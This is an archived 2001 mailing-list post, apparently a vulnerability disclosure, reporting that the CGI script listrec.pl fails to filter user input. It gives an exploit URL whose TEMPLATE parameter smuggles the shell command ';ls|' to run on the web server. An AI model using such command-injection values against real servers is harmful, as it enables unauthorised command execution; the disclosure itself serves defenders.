|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
From: Alexey Sintsov (don_huan
xakep.ru)Date: Tue Sep 11 2001 - 23:01:24 CDT
Last update (of listrec.pl) Jon Wright 11/11/1998.
This script has vulnerability (does not filter input of the
user) which allows to carry out commands from
WebServer.
EXPLOIT:
www.server.com/cgi-bin/common/listrec.pl?
APP=qmh-news&TEMPLATE=;ls|
XP-TEAM
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]